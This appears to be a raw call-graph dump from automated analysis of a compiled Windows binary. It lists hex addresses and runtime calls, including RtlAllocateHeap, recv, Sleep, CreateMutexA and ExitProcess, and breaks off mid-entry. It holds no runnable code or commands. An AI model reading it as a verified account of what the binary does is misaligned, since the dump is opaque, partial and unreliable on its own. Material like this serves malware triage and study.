10387 bf9563 __cftof 10379->10387 10383 bfd3e2 RtlAllocateHeap 10380->10383 10380->10387 10381->10378 10382 bf955d 10381->10382 10385 bfd3e2 RtlAllocateHeap 10382->10385 10383->10387 10384 c16c6a RtlAllocateHeap 10386 bf9628 shared_ptr 10384->10386 10385->10387 10386->10351 10387->10384 10388 bf95e1 shared_ptr __cftof 10387->10388 10388->10351 10389 be42b0 10392 be3ac0 10389->10392 10391 be42bb shared_ptr 10394 be3af9 10392->10394 10393 be3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10393->10391 10394->10393 10395 c16c6a RtlAllocateHeap 10394->10395 10396 be3be6 10395->10396 10399 be3c38 10396->10399 10404 be32d0 10396->10404 10397 be32d0 6 API calls 10401 be3c5f 10397->10401 10399->10397 10399->10401 10400 be3c68 10400->10391 10401->10400 10423 be3810 10401->10423 10427 bfc6ac 10404->10427 10406 be336b 10433 bfc26a 10406->10433 10409 be333c __Mtx_unlock 10410 bfc26a 5 API calls 10409->10410 10414 be3350 std::invalid_argument::invalid_argument 10409->10414 10412 be3377 10410->10412 10411 be3314 10411->10406 10411->10409 10430 bfbd4c 10411->10430 10413 bfc6ac GetSystemTimePreciseAsFileTime 10412->10413 10415 be33af 10413->10415 10414->10399 10416 bfc26a 5 API calls 10415->10416 10417 be33b6 __Cnd_broadcast 10415->10417 10416->10417 10418 bfc26a 5 API calls 10417->10418 10419 be33d7 __Mtx_unlock 10417->10419 10418->10419 10420 bfc26a 5 API calls 10419->10420 10421 be33eb 10419->10421 10422 be340e 10420->10422 10421->10399 10422->10399 10424 be381c 10423->10424 10514 be2440 10424->10514 10437 bfc452 10427->10437 10429 bfc6b9 10429->10411 10454 bfbb72 10430->10454 10432 bfbd5c 10432->10411 10434 bfc292 10433->10434 10435 bfc274 10433->10435 10434->10434 10435->10434 10460 bfc297 10435->10460 10438 bfc4a8 10437->10438 10440 bfc47a std::invalid_argument::invalid_argument 10437->10440 10438->10440 10443 bfcf6b 10438->10443 10440->10429 10441 bfc4fd __Xtime_diff_to_millis2 10441->10440 10442 bfcf6b _xtime_get GetSystemTimePreciseAsFileTime 10441->10442 10442->10441 10444 bfcf7a 10443->10444 10446 bfcf87 __aulldvrm 10443->10446 10444->10446 10447 bfcf44 10444->10447 10446->10441 10450 bfcbea 10447->10450 10451 bfcbfb GetSystemTimePreciseAsFileTime 10450->10451 10452 bfcc07 10450->10452 10451->10452 10452->10446 10455 bfbb9c 10454->10455 10456 bfcf6b _xtime_get GetSystemTimePreciseAsFileTime 10455->10456 10459 bfbba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 10455->10459 10457 bfbbcf __Xtime_diff_to_millis2 10456->10457 10458 bfcf6b _xtime_get GetSystemTimePreciseAsFileTime 10457->10458 10457->10459 10458->10459 10459->10432 10465 be2ae0 10460->10465 10464 bfc2bf Concurrency::cancel_current_task 10481 bfbedf 10465->10481 10467 be2aff 10473 bfc1ff 10467->10473 10468 be2af4 __dosmaperr 10468->10467 10469 c1a671 __cftof 4 API calls 10468->10469 10472 c16ccc 10469->10472 10470 c18bec __cftof 4 API calls 10471 c16cf6 10470->10471 10472->10470 10474 bfc20b __EH_prolog3_GS 10473->10474 10475 bf80c0 RtlAllocateHeap 10474->10475 10476 bfc23d 10475->10476 10488 be26b0 10476->10488 10478 bfc252 10505 bf7970 10478->10505 10480 bfc25a 10480->10464 10484 bfcc31 10481->10484 10485 bfcc3f InitOnceExecuteOnce 10484->10485 10487 bfbef2 10484->10487 10485->10487 10487->10468 10489 bf7a00 RtlAllocateHeap 10488->10489 10490 be2702 10489->10490 10491 be2725 10490->10491 10492 bf8f40 RtlAllocateHeap 10490->10492 10493 bf8f40 RtlAllocateHeap 10491->10493 10494 be278e 10491->10494 10492->10491 10493->10494 10495 be27ed shared_ptr 10494->10495 10497 be28b8 10494->10497 10496 c138af ___std_exception_copy RtlAllocateHeap 10495->10496 10500 be284b 10496->10500 10498 c16c6a RtlAllocateHeap 10497->10498 10498->10500 10499 be287a shared_ptr std::invalid_argument::invalid_argument 10499->10478 10500->10499 10501 c16c6a RtlAllocateHeap 10500->10501 10502 be28c2 10501->10502 10510 c13912 10502->10510 10504 be28e5 shared_ptr 10504->10478 10506 bf797b 10505->10506 10507 bf7996 shared_ptr 10505->10507 10506->10507 10508 c16c6a RtlAllocateHeap 10506->10508 10507->10480 10509 bf79ba 10508->10509 10511 c13926 10510->10511 10512 c1391f 10510->10512 10511->10504 10513 c18ba3 ___std_exception_copy RtlAllocateHeap 10512->10513 10513->10511 10517 bfb5d6 10514->10517 10516 be2472 10518 bfb5f1 Concurrency::cancel_current_task 10517->10518 10519 c18bec __cftof 4 API calls 10518->10519 10521 bfb658 __cftof std::invalid_argument::invalid_argument 10518->10521 10520 bfb69f 10519->10520 10521->10516 10522 be5cad 10524 be5caf shared_ptr 10522->10524 10523 be5d17 shared_ptr std::invalid_argument::invalid_argument 10524->10523 10525 c16c6a RtlAllocateHeap 10524->10525 10526 be5d47 __cftof 10525->10526 10526->10526 10527 bf80c0 RtlAllocateHeap 10526->10527 10529 be5e3e 10527->10529 10528 be5ea6 shared_ptr std::invalid_argument::invalid_argument 10529->10528 10530 c16c6a RtlAllocateHeap 10529->10530 10531 be5ed2 10530->10531 10532 be5ffe shared_ptr std::invalid_argument::invalid_argument 10531->10532 10533 c16c6a RtlAllocateHeap 10531->10533 10534 be601b 10533->10534 10535 bf80c0 RtlAllocateHeap 10534->10535 10536 be6089 10535->10536 10537 bf80c0 RtlAllocateHeap 10536->10537 10538 be60bd 10537->10538 10539 bf80c0 RtlAllocateHeap 10538->10539 10540 be60ee 10539->10540 10541 bf80c0 RtlAllocateHeap 10540->10541 10542 be611f 10541->10542 10543 bf80c0 RtlAllocateHeap 10542->10543 10545 be6150 10543->10545 10544 be65b1 shared_ptr std::invalid_argument::invalid_argument 10545->10544 10546 c16c6a RtlAllocateHeap 10545->10546 10547 be65dc 10546->10547 10548 bf7a00 RtlAllocateHeap 10547->10548 10549 be66a6 10548->10549 10550 be5c10 4 API calls 10549->10550 10551 be66ac 10550->10551 10552 be5c10 4 API calls 10551->10552 10553 be66b1 10552->10553 10554 be22c0 4 API calls 10553->10554 10555 be66c9 shared_ptr 10554->10555 10556 bf7a00 RtlAllocateHeap 10555->10556 10557 be6732 10556->10557 10558 be5c10 4 API calls 10557->10558 10559 be673d 10558->10559 10560 be22c0 4 API calls 10559->10560 10569 be6757 shared_ptr 10560->10569 10561 be6852 10562 bf80c0 RtlAllocateHeap 10561->10562 10564 be689c 10562->10564 10563 bf7a00 RtlAllocateHeap 10563->10569 10565 bf80c0 RtlAllocateHeap 10564->10565 10567 be68e3 shared_ptr std::invalid_argument::invalid_argument 10565->10567 10566 be5c10 4 API calls 10566->10569 10568 be22c0 4 API calls 10568->10569 10569->10561 10569->10563 10569->10566 10569->10568 10570 be1aa0 10571 bf80c0 RtlAllocateHeap 10570->10571 10572 be1ab1 10571->10572 10575 bfd64e 10572->10575 10578 bfd621 10575->10578 10579 bfd637 10578->10579 10580 bfd630 10578->10580 10587 c198fa 10579->10587 10584 c1988e 10580->10584 10583 be1abb 10585 c198fa RtlAllocateHeap 10584->10585 10586 c198a0 10585->10586 10586->10583 10590 c19630 10587->10590 10589 c1992b 10589->10583 10591 c1963c __dosmaperr 10590->10591 10594 c1968b 10591->10594 10593 c19657 10593->10589 10595 c196a7 10594->10595 10603 c1971e __dosmaperr 10594->10603 10602 c196fe 10595->10602 10595->10603 10604 c1edf6 10595->10604 10597 c1edf6 RtlAllocateHeap 10599 c19714 10597->10599 10598 c196f4 10600 c1adf5 __freea RtlAllocateHeap 10598->10600 10601 c1adf5 __freea RtlAllocateHeap 10599->10601 10600->10602 10601->10603 10602->10597 10602->10603 10603->10593 10603->10603 10605 c1ee03 10604->10605 10606 c1ee1e 10604->10606 10605->10606 10607 c1ee0f 10605->10607 10608 c1ee2d 10606->10608 10613 c24fdc 10606->10613 10609 c175f6 __dosmaperr RtlAllocateHeap 10607->10609 10620 c2500f 10608->10620 10612 c1ee14 __cftof 10609->10612 10612->10598 10614 c24fe7 10613->10614 10617 c24ffc 10613->10617 10615 c175f6 __dosmaperr RtlAllocateHeap 10614->10615 10616 c24fec 10615->10616 10618 c16c5a ___std_exception_copy RtlAllocateHeap 10616->10618 10617->10608 10619 c24ff7 10618->10619 10619->10608 10621 c25027 10620->10621 10622 c2501c 10620->10622 10624 c2502f 10621->10624 10628 c25038 __dosmaperr 10621->10628 10623 c1b04b __cftof RtlAllocateHeap 10622->10623 10627 c25024 10623->10627 10625 c1adf5 __freea RtlAllocateHeap 10624->10625 10625->10627 10626 c175f6 __dosmaperr RtlAllocateHeap 10626->10627 10627->10612 10628->10626 10628->10627 10649 be20a0 10654 bfc68b 10649->10654 10652 bfd64e RtlAllocateHeap 10653 be20b6 10652->10653 10657 bfc3d5 10654->10657 10656 be20ac 10656->10652 10658 bfc3eb 10657->10658 10659 bfc3e1 10657->10659 10658->10656 10660 bfc3be 10659->10660 10661 bfc39e 10659->10661 10670 bfcd0a 10660->10670 10661->10658 10666 bfccd5 10661->10666 10663 bfc3d0 10663->10656 10667 bfc3b7 10666->10667 10668 bfcce3 InitializeCriticalSectionEx 10666->10668 10667->10656 10668->10667 10671 bfcd1f RtlInitializeConditionVariable 10670->10671 10671->10663 10687 be34a0 10688 be34aa 10687->10688 10689 be34ca shared_ptr 10687->10689 10688->10689 10690 c16c6a RtlAllocateHeap 10688->10690 10691 be34f2 Concurrency::cancel_current_task shared_ptr 10690->10691 10692 be5a9e 10695 be5a61 10692->10695 10693 bf80c0 RtlAllocateHeap 10693->10695 10695->10692 10695->10693 10696 bf7a00 RtlAllocateHeap 10695->10696 10697 be5bdd std::invalid_argument::invalid_argument 10695->10697 10698 be5730 10695->10698 10696->10695 10703 be5860 shared_ptr 10698->10703 10706 be5799 shared_ptr 10698->10706 10699 be592a 10707 bf8200 10699->10707 10700 bf80c0 RtlAllocateHeap 10700->10706 10702 be5900 shared_ptr std::invalid_argument::invalid_argument 10702->10695 10703->10702 10704 c16c6a RtlAllocateHeap 10703->10704 10705 be5934 10704->10705 10706->10699 10706->10700 10706->10703 10710 bfc1d9 10707->10710 10709 bf820a 10713 bfc15d 10710->10713 10712 bfc1ea Concurrency::cancel_current_task 10712->10709 10714 be22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 10713->10714 10715 bfc16f 10714->10715 10715->10712 10723 be3c8e 10724 be3c98 10723->10724 10725 be3cb4 10724->10725 10733 be2410 10724->10733 10729 be3ccf 10725->10729 10730 be3810 4 API calls 10725->10730 10731 be3810 4 API calls 10729->10731 10730->10729 10732 be3cdb 10731->10732 10734 be2424 10733->10734 10748 bfb52d 10734->10748 10737 be3ce0 10738 be3d42 10737->10738 10740 be3d52 10737->10740 10796 bf7d50 10738->10796 10741 bfd3e2 RtlAllocateHeap 10740->10741 10742 be3d84 10741->10742 10743 bf7d50 RtlAllocateHeap 10742->10743 10744 be3e03 10742->10744 10743->10744 10745 c16c6a RtlAllocateHeap 10744->10745 10746 be3e9b shared_ptr 10744->10746 10747 be3ec1 10745->10747 10746->10725 10756 c13aed 10748->10756 10750 be242a 10750->10737 10751 bfb5a5 ___std_exception_copy 10763 bfb1ad 10751->10763 10752 bfb598 10759 bfaf56 10752->10759 10767 c14f29 10756->10767 10758 bfb555 10758->10750 10758->10751 10758->10752 10760 bfaf9f ___std_exception_copy 10759->10760 10762 bfafb2 shared_ptr 10760->10762 10779 bfb39f 10760->10779 10762->10750 10764 bfb1d8 10763->10764 10766 bfb1e1 shared_ptr 10763->10766 10765 bfb39f 5 API calls 10764->10765 10765->10766 10766->10750 10774 c14f37 10767->10774 10769 c14f2e __cftof 10769->10758 10770 c1d634 __cftof 4 API calls 10769->10770 10773 c18bfc __cftof 10769->10773 10770->10773 10771 c165ed __cftof 3 API calls 10772 c18c2f 10771->10772 10773->10771 10775 c14f40 10774->10775 10776 c14f43 10774->10776 10775->10769 10777 c18ba3 ___std_exception_copy RtlAllocateHeap 10776->10777 10778 c14f77 10776->10778 10777->10778 10778->10769 10780 bfbedf InitOnceExecuteOnce 10779->10780 10781 bfb3e1 10780->10781 10782 bfb3e8 10781->10782 10790 c16cbb 10781->10790 10782->10762 10791 c16cc7 __dosmaperr 10790->10791 10792 c1a671 __cftof 4 API calls 10791->10792 10793 c16ccc 10792->10793 10794 c18bec __cftof 4 API calls 10793->10794 10795 c16cf6 10794->10795 10797 bf7dcb 10796->10797 10798 bf7d62 10796->10798 10799 be2480 RtlAllocateHeap 10797->10799 10800 bf7d6d 10798->10800 10801 bf7d9c 10798->10801 10803 bf7d7a 10799->10803 10800->10797 10804 bf7d74 10800->10804 10802 bf7db9 10801->10802 10806 bfd3e2 RtlAllocateHeap 10801->10806 10802->10740 10807 c16c6a RtlAllocateHeap 10803->10807 10809 bf7d83 10803->10809 10805 bfd3e2 RtlAllocateHeap 10804->10805 10805->10803 10808 bf7da6 10806->10808 10815 bf7dd5 10807->10815 10808->10740 10809->10740 10810 bf7f20 10811 bf9270 RtlAllocateHeap 10810->10811 10824 bf7e91 __cftof 10811->10824 10812 bf7e01 10812->10740 10813 c16c6a RtlAllocateHeap 10823 bf7f2a __cftof 10813->10823 10814 bf7f1b 10818 be2480 RtlAllocateHeap 10814->10818 10815->10810 10815->10812 10815->10814 10816 bf7ea7 10815->10816 10817 bf7e80 10815->10817 10820 bfd3e2 RtlAllocateHeap 10816->10820 10816->10824 10817->10814 10819 bf7e8b 10817->10819 10818->10810 10821 bfd3e2 RtlAllocateHeap 10819->10821 10820->10824 10821->10824 10822 bf7f61 shared_ptr 10822->10740 10823->10822 10826 c16c6a RtlAllocateHeap 10823->10826 10824->10813 10825 bf7f02 shared_ptr 10824->10825 10825->10740 10827 bf7f7c 10826->10827 10828 c244f2 10829 c244ff 10828->10829 10830 c2450c 10828->10830 10831 c175f6 __dosmaperr RtlAllocateHeap 10829->10831 10833 c24518 10830->10833 10834 c175f6 __dosmaperr RtlAllocateHeap 10830->10834 10832 c24504 10831->10832 10835 c24539 10834->10835 10836 c16c5a ___std_exception_copy RtlAllocateHeap 10835->10836 10836->10832 10837 bea682 10838 bea68a shared_ptr 10837->10838 10839 bea75d shared_ptr 10838->10839 10840 bea949 10838->10840 10845 bf80c0 RtlAllocateHeap 10839->10845 10841 bea94e 10840->10841 10842 c16c6a RtlAllocateHeap 10840->10842 10843 bea953 Sleep CreateMutexA 10841->10843 10844 c16c6a RtlAllocateHeap 10841->10844 10842->10841 10847 bea98e 10843->10847 10844->10843 10846 bea903 10845->10846 10888 bf8680 10889 bf86e0 10888->10889 10889->10889 10897 bf7760 10889->10897 10891 bf86f9 10892 bf8f40 RtlAllocateHeap 10891->10892 10893 bf8714 10891->10893 10892->10893 10894 bf8f40 RtlAllocateHeap 10893->10894 10896 bf8769 10893->10896 10895 bf87b1 10894->10895 10898 bf777b 10897->10898 10910 bf7864 shared_ptr __cftof 10897->10910 10899 bf78f1 10898->10899 10903 bf77ea 10898->10903 10904 bf7811 10898->10904 10909 bf77fb __cftof 10898->10909 10898->10910 10900 bf9270 RtlAllocateHeap 10899->10900 10901 bf78f6 10900->10901 10902 be2480 RtlAllocateHeap 10901->10902 10905 bf78fb 10902->10905 10903->10901 10906 bfd3e2 RtlAllocateHeap 10903->10906 10907 bfd3e2 RtlAllocateHeap 10904->10907 10904->10909 10906->10909 10907->10909 10908 c16c6a RtlAllocateHeap 10908->10899 10909->10908 10909->10910 10910->10891 10915 be6ae9 10917 be6b01 10915->10917 10916 bf80c0 RtlAllocateHeap 10918 be6bac 10916->10918 10917->10916 10920 be6bbd shared_ptr 10917->10920 10919 bf9280 RtlAllocateHeap 10918->10919 10919->10920 10921 bf80c0 RtlAllocateHeap 10920->10921 10922 be6ce3 shared_ptr std::invalid_argument::invalid_argument 10921->10922 10971 be9adc 10972 be9aea shared_ptr 10971->10972 10973 bea917 10972->10973 10976 be9b4b shared_ptr 10972->10976 10974 bea953 Sleep CreateMutexA 10973->10974 10975 c16c6a RtlAllocateHeap 10973->10975 10979 bea98e 10974->10979 10975->10974 10977 be9b65 10976->10977 10978 be9b59 10976->10978 10980 bf7a00 RtlAllocateHeap 10977->10980 10981 bf80c0 RtlAllocateHeap 10978->10981 10982 be9b74 10980->10982 10983 bea903 10981->10983 10984 be5c10 4 API calls 10982->10984 10985 be9b7c 10984->10985 10986 be8b30 4 API calls 10985->10986 10987 be9b8d 10986->10987 10988 bf8220 RtlAllocateHeap 10987->10988 10989 be9b9c 10988->10989 10990 bf7a00 RtlAllocateHeap 10989->10990 10991 be9ca9 10990->10991 10992 be5c10 4 API calls 10991->10992 10993 be9cb1 10992->10993 10994 be8b30 4 API calls 10993->10994 10995 be9cc2 10994->10995 10996 bf8220 RtlAllocateHeap 10995->10996 10997 be9cd1 10996->10997 10998 bfd0c7 10999 bfd0d7 10998->10999 11000 bfd17f 10999->11000 11001 bfd17b RtlWakeAllConditionVariable 10999->11001 11007 be20c0 11008 bfc68b __Mtx_init_in_situ 2 API calls 11007->11008 11009 be20cc 11008->11009 11010 bfd64e RtlAllocateHeap 11009->11010 11011 be20d6 11010->11011 11032 bee0c0 recv 11033 bee122 recv 11032->11033 11034 bee157 recv 11033->11034 11035 bee191 11034->11035 11036 bee2b3 std::invalid_argument::invalid_argument 11035->11036 11037 bfc6ac GetSystemTimePreciseAsFileTime 11035->11037 11038 bee2ee 11037->11038 11039 bfc26a 5 API calls 11038->11039 11040 bee358 11039->11040 11056 be2ec0 11057 be2f06 11056->11057 11061 be2f6f 11056->11061 11058 bfc6ac GetSystemTimePreciseAsFileTime 11057->11058 11059 be2f12 11058->11059 11062 be301e 11059->11062 11063 be2f1d 11059->11063 11060 be2fef 11061->11060 11069 bfc6ac GetSystemTimePreciseAsFileTime 11061->11069 11064 bfc26a 5 API calls 11062->11064 11066 bfd3e2 RtlAllocateHeap 11063->11066 11068 be2f30 __Mtx_unlock 11063->11068 11065 be3024 11064->11065 11067 bfc26a 5 API calls 11065->11067 11066->11068 11070 be2fb9 11067->11070 11068->11061 11068->11065 11069->11070 11071 bfc26a 5 API calls 11070->11071 11072 be2fc0 __Mtx_unlock 11070->11072 11071->11072 11073 bfc26a 5 API calls 11072->11073 11074 be2fd8 __Cnd_broadcast 11072->11074 11073->11074 11074->11060 11075 bfc26a 5 API calls 11074->11075 11076 be303c 11075->11076 11077 bfc6ac GetSystemTimePreciseAsFileTime 11076->11077 11088 be3080 shared_ptr __Mtx_unlock 11077->11088 11078 be31c5 11079 bfc26a 5 API calls 11078->11079 11080 be31cb 11079->11080 11081 bfc26a 5 API calls 11080->11081 11082 be31d1 11081->11082 11083 bfc26a 5 API calls 11082->11083 11084 be3193 __Mtx_unlock 11083->11084 11085 bfc26a 5 API calls 11084->11085 11086 be31a7 std::invalid_argument::invalid_argument 11084->11086 11087 be31dd 11085->11087 11088->11078 11088->11080 11088->11086 11089 bfc6ac GetSystemTimePreciseAsFileTime 11088->11089 11090 be315f 11089->11090 11090->11078 11090->11082 11090->11084 11091 bfbd4c GetSystemTimePreciseAsFileTime 11090->11091 11091->11090 11092 c16a44 11093 c16a52 11092->11093 11094 c16a5c 11092->11094 11105 c1b655 11093->11105 11110 c1698d 11094->11110 11097 c16a59 11098 c16a76 11113 c168ed 11098->11113 11101 c16a8a 11103 c1adf5 __freea RtlAllocateHeap 11101->11103 11104 c16aa8 11101->11104 11102 c1b655 RtlAllocateHeap 11102->11101 11103->11104 11106 c1b662 11105->11106 11107 c1b679 11106->11107 11116 c175c0 11106->11116 11107->11097 11111 c1690a __cftof 4 API calls 11110->11111 11112 c1699f 11111->11112 11112->11098 11124 c1683b 11113->11124 11121 c175e3 11116->11121 11118 c175cb __dosmaperr 11119 c175f6 __dosmaperr RtlAllocateHeap 11118->11119 11120 c175de 11119->11120 11120->11097 11122 c1a7c8 __dosmaperr RtlAllocateHeap 11121->11122 11123 c175e8 11122->11123 11123->11118 11125 c16863 11124->11125 11126 c16849 11124->11126 11128 c1686a 11125->11128 11130 c16889 __cftof 11125->11130 11137 c169cc 11126->11137 11134 c16853 11128->11134 11141 c169e6 11128->11141 11131 c169e6 RtlAllocateHeap 11130->11131 11133 c1689f __cftof 11130->11133 11131->11133 11132 c175c0 __dosmaperr RtlAllocateHeap 11135 c168ab 11132->11135 11133->11132 11133->11134 11134->11101 11134->11102 11136 c175f6 __dosmaperr RtlAllocateHeap 11135->11136 11136->11134 11138 c169d7 11137->11138 11140 c169df 11137->11140 11139 c1adf5 __freea RtlAllocateHeap 11138->11139 11139->11140 11140->11134 11142 c169cc RtlAllocateHeap 11141->11142 11143 c169f4 11142->11143 11146 c16a25 11143->11146 11147 c1b04b __cftof RtlAllocateHeap 11146->11147 11148 c16a05 11147->11148 11148->11134 11190 be1020 11191 bf80c0 RtlAllocateHeap 11190->11191 11192 be1031 11191->11192 11193 bfd64e RtlAllocateHeap 11192->11193 11194 be103b 11193->11194 11195 bea418 11196 bea420 shared_ptr 11195->11196 11197 bea93f 11196->11197 11198 bea4f3 shared_ptr 11196->11198 11199 c16c6a RtlAllocateHeap 11197->11199 11201 bf80c0 RtlAllocateHeap 11198->11201 11200 bea944 11199->11200 11202 c16c6a RtlAllocateHeap 11200->11202 11203 bea903 11201->11203 11204 bea949 11202->11204 11205 bea94e 11204->11205 11206 c16c6a RtlAllocateHeap 11204->11206 11207 bea953 Sleep CreateMutexA 11205->11207 11208 c16c6a RtlAllocateHeap 11205->11208 11206->11205 11209 bea98e 11207->11209 11208->11207 11226 be2e00 11227 be2e28 11226->11227 11228 bfc68b __Mtx_init_in_situ 2 API calls 11227->11228 11229 be2e33 11228->11229 11230 be1000 11231 bfd64e RtlAllocateHeap 11230->11231 11232 be100a 11231->11232 11263 bea079 11264 bea081 shared_ptr 11263->11264 11265 bea930 11264->11265 11267 bea154 shared_ptr 11264->11267 11266 c16c6a RtlAllocateHeap 11265->11266 11268 bea953 Sleep CreateMutexA 11266->11268 11269 bf80c0 RtlAllocateHeap 11267->11269 11271 bea98e 11268->11271 11270 bea903 11269->11270 11272 becc79 11277 becc84 shared_ptr 11272->11277 11273 bece09 shared_ptr std::invalid_argument::invalid_argument 11274 bece31 11276 c16c6a RtlAllocateHeap 11274->11276 11275 bf7a00 RtlAllocateHeap 11275->11277 11278 bece36 11276->11278 11277->11273 11277->11274 11277->11275 11279 be5c10 4 API calls 11277->11279 11285 bf8220 RtlAllocateHeap 11277->11285 11287 bf8f40 RtlAllocateHeap 11277->11287 11288 be9030 11277->11288 11280 bf7a00 RtlAllocateHeap 11278->11280 11279->11277 11281 bece92 11280->11281 11283 be5c10 4 API calls 11281->11283 11284 bece9d 11283->11284 11301 beca70 11284->11301 11285->11277 11287->11277 11289 be9080 11288->11289 11290 bf7a00 RtlAllocateHeap 11289->11290 11291 be908f 11290->11291 11292 be5c10 4 API calls 11291->11292 11293 be909a 11292->11293 11294 bf80c0 RtlAllocateHeap 11293->11294 11295 be90ec 11294->11295 11296 bf8220 RtlAllocateHeap 11295->11296 11298 be90fe shared_ptr 11296->11298 11297 be917e shared_ptr std::invalid_argument::invalid_argument 11297->11277 11298->11297 11299 c16c6a RtlAllocateHeap 11298->11299 11300 be91aa 11299->11300 11313 becadd 11301->11313 11302 bf7a00 RtlAllocateHeap 11302->11313 11303 bece09 shared_ptr std::invalid_argument::invalid_argument 11304 bece31 11306 c16c6a RtlAllocateHeap 11304->11306 11305 be5c10 4 API calls 11305->11313 11308 bece36 11306->11308 11307 be9030 4 API calls 11307->11313 11309 bf7a00 RtlAllocateHeap 11308->11309 11311 bece92 11309->11311 11310 bf8220 RtlAllocateHeap 11310->11313 11312 be5c10 4 API calls 11311->11312 11314 bece9d 11312->11314 11313->11302 11313->11303 11313->11304 11313->11305 11313->11307 11313->11310 11316 bf8f40 RtlAllocateHeap 11313->11316 11315 beca70 4 API calls 11314->11315 11316->11313 11317 be4276 11318 be2410 5 API calls 11317->11318 11319 be427f 11318->11319 11320 be3ce0 RtlAllocateHeap 11319->11320 11321 be428f 11320->11321 9640 c16629 9643 c164c7 9640->9643 9646 c164d5 __cftof 9643->9646 9644 c16520 9646->9644 9648 c1652b 9646->9648 9647 c1652a 9654 c1a302 GetPEB 9648->9654 9650 c16535 9651 c1654a __cftof 9650->9651 9652 c1653a GetPEB 9650->9652 9653 c16562 ExitProcess 9651->9653 9652->9651 9655 c1a31c __cftof 9654->9655 9655->9650 9656 bea856 9657 bea870 9656->9657 9658 bea892 shared_ptr 9656->9658 9657->9658 9659 bea94e 9657->9659 9665 bf80c0 9658->9665 9661 bea953 Sleep CreateMutexA 9659->9661 9680 c16c6a 9659->9680 9664 bea98e 9661->9664 9663 bea903 9666 bf80de 9665->9666 9669 bf8104 9665->9669 9666->9663 9667 bf81ee 9688 bf9270 9667->9688 9669->9667 9672 bf817d 9669->9672 9673 bf8158 9669->9673 9670 bf81f3 9691 be2480 9670->9691 9675 bfd3e2 RtlAllocateHeap 9672->9675 9678 bf8169 __cftof 9672->9678 9673->9670 9683 bfd3e2 9673->9683 9675->9678 9677 c16c6a RtlAllocateHeap 9677->9667 9678->9677 9679 bf81d0 shared_ptr 9678->9679 9679->9663 9681 c16bf6 ___std_exception_copy RtlAllocateHeap 9680->9681 9682 c16c79 ___std_exception_copy 9681->9682 9685 be2480 Concurrency::cancel_current_task __dosmaperr ___std_exception_copy 9683->9685 9684 bfd401 Concurrency::cancel_current_task 9684->9678 9685->9684 9695 c138af 9685->9695 9784 bfc1b9 9688->9784 9692 be248e Concurrency::cancel_current_task 9691->9692 9693 c138af ___std_exception_copy RtlAllocateHeap 9692->9693 9694 be24c3 9693->9694 9696 be24c3 9695->9696 9697 c138bc ___std_exception_copy 9695->9697 9696->9678 9697->9696 9698 c138e9 9697->9698 9701 c1a1f1 9697->9701 9710 c18ba3 9698->9710 9702 c1a20c 9701->9702 9703 c1a1fe 9701->9703 9713 c175f6 9702->9713 9703->9702 9708 c1a223 9703->9708 9705 c1a214 9716 c16c5a 9705->9716 9707 c1a21e 9707->9698 9708->9707 9709 c175f6 __dosmaperr RtlAllocateHeap 9708->9709 9709->9705 9711 c1adf5 __freea RtlAllocateHeap 9710->9711 9712 c18bbb 9711->9712 9712->9696 9719 c1a7c8 9713->9719 9778 c16bf6 9716->9778 9718 c16c66 9718->9707 9720 c1a7d2 __dosmaperr 9719->9720 9722 c175fb 9720->9722 9730 c1d82f 9720->9730 9722->9705 9723 c1a813 __dosmaperr 9724 c1a853 9723->9724 9725 c1a81b __dosmaperr 9723->9725 9738 c1a49f 9724->9738 9734 c1adf5 9725->9734 9729 c1adf5 __freea RtlAllocateHeap 9729->9722 9733 c1d83c __dosmaperr 9730->9733 9731 c1d867 RtlAllocateHeap 9732 c1d87a __dosmaperr 9731->9732 9731->9733 9732->9723 9733->9731 9733->9732 9735 c1ae00 9734->9735 9737 c1ae1b __dosmaperr 9734->9737 9736 c175f6 __dosmaperr RtlAllocateHeap 9735->9736 9735->9737 9736->9737 9737->9722 9739 c1a50d __dosmaperr 9738->9739 9742 c1a445 9739->9742 9741 c1a536 9741->9729 9743 c1a451 __dosmaperr 9742->9743 9746 c1a626 9743->9746 9745 c1a473 __dosmaperr 9745->9741 9747 c1a65c __dosmaperr 9746->9747 9748 c1a635 __dosmaperr 9746->9748 9747->9745 9748->9747 9750 c1f35f 9748->9750 9751 c1f3df 9750->9751 9754 c1f375 9750->9754 9752 c1f42d 9751->9752 9755 c1adf5 __freea RtlAllocateHeap 9751->9755 9753 c1f4d0 __dosmaperr RtlAllocateHeap 9752->9753 9774 c1f43b 9753->9774 9754->9751 9756 c1f3a8 9754->9756 9760 c1adf5 __freea RtlAllocateHeap 9754->9760 9757 c1f401 9755->9757 9758 c1f3ca 9756->9758 9766 c1adf5 __freea RtlAllocateHeap 9756->9766 9759 c1adf5 __freea RtlAllocateHeap 9757->9759 9762 c1adf5 __freea RtlAllocateHeap 9758->9762 9761 c1f414 9759->9761 9765 c1f39d 9760->9765 9767 c1adf5 __freea RtlAllocateHeap 9761->9767 9763 c1f3d4 9762->9763 9768 c1adf5 __freea RtlAllocateHeap 9763->9768 9764 c1f49b 9769 c1adf5 __freea RtlAllocateHeap 9764->9769 9770 c1ef3c ___free_lconv_mon RtlAllocateHeap 9765->9770 9771 c1f3bf 9766->9771 9772 c1f422 9767->9772 9768->9751 9773 c1f4a1 9769->9773 9770->9756 9775 c1f03a __dosmaperr RtlAllocateHeap 9771->9775 9776 c1adf5 __freea RtlAllocateHeap 9772->9776 9773->9747 9774->9764 9777 c1adf5 RtlAllocateHeap __freea 9774->9777 9775->9758 9776->9752 9777->9774 9779 c1a7c8 __dosmaperr RtlAllocateHeap 9778->9779 9780 c16c01 ___std_exception_copy 9779->9780 9781 c16c0f 9780->9781 9782 c16bf6 ___std_exception_copy RtlAllocateHeap 9780->9782 9781->9718 9783 c16c66 9782->9783 9783->9718 9787 bfc123 9784->9787 9786 bfc1ca Concurrency::cancel_current_task 9790 be22e0 9787->9790 9789 bfc135 9789->9786 9791 c138af ___std_exception_copy RtlAllocateHeap 9790->9791 9792 be2317 std::invalid_argument::invalid_argument 9791->9792 9792->9789 9793 c1d82f 9796 c1d83c __dosmaperr 9793->9796 9794 c1d867 RtlAllocateHeap 9795 c1d87a __dosmaperr 9794->9795 9794->9796 9796->9794 9796->9795 11376 bfbe50 11379 bfbd8b 11376->11379 11378 bfbe66 Concurrency::cancel_current_task std::_Throw_future_error 11380 be22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11379->11380 11381 bfbd9f 11380->11381 11381->11378 11382 be3c47 11383 be3c51 11382->11383 11385 be32d0 6 API calls 11383->11385 11386 